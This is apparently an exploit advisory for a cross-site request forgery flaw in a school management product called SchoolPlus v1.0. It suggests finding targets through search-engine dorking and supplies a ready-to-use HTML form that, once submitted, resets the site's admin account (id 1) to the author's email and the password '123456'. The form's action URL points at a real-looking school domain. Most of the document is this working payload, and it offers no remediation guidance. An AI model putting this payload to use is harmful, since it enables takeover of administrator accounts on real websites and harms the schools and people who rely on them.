============================================================================================================================================= | # Title : SchoolPlus v1.0 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : http://webpay.com.np/#Product | ============================================================================================================================================= poc : [+] Dorking Ä°n Google Or Other Search Enggine. [+] The following HTML code modifies the admin information. [+] Go to the line 5. Set the target site link Save changes and apply . [+] infected file : cms/user/modify.php. [+] http://127.0.0.1/q7.3/cms/user/modify.php. [+] save code as poc.html [+] payload : </head> <body> <div class="container"> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"> <div hidden="true"> <input type="text" name="id" id="id" value="1"> </div> <div> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"> </div> <div> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"> </div> <tr> <div> <label for='status'>Status</label> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label> </div> <div style='height:80'> <input type='submit' value='Submit'><input type='reset' Value='Reset'> </div> </form> </div> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================